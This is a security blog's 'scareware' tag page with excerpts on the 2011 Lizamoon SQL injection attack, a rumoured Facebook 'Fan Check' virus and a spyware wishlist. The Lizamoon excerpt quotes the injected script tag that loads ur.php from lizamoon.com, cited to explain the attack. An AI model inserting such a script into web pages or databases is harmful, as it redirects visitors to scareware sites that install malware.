Tag: scareware

  • The Great Lizamoon SQL Injection Attack – March-April 2011

    Well – Friday things started getting interesting on tech news sites. Most sites were running phony April fools stories and a few including websense was running with a major attack going on against many SQL based websites. Details were sketchy – people were told to look for ur.php files in their web directory (which isn’t exactly a good test to see if your site has been infected by this SQL injection…) “<script src=http://lizamoon.com/ur.php”> is an example of the code that is inserted into sql databases and what it basically does is force visitors to visit a scareware site where malware may be installed onto their computer that claims they have a virus…. (how many of those have we seen in the last 5-10 years?)

    One of my annoyances with tech news (and especially virus news) coverage is that when a story gets big enough to be covered by the big media, they never do it justice. I want information. What is this attacking? What programs are vulnerable, is there a pattern?

    (more…)

  • Facebook Fan Check Virus

    There’s a rumor going around and a lot of unconfirmed information that a facebook application known as fan check is actually a virus. I’m seeing several claims that if someone becomes a fan of this facebook app (which the page claims is undergoing changes and currently unavailable)… well if someone becomes a fan in the meantime their friends will all be notified of the app, password on the account changed, etc. I’m a bit skeptical at this point because EVERYTHING I see seems 3rd party and I don’t see anyone claiming that THEIR account was compromised. What I DO know is that some of the top search results are known malware attack sites. For instance the second result (which was the top result a few hours ago….

    (more…)

  • Wishlist of spyware slime….

    The sunbeltblog has uncovered a fairly interesting document. (Dated May 16 and originally in Russian) which appears to be the wishlist of a spyware criminal. (Slime was my own definition…)

    (more…)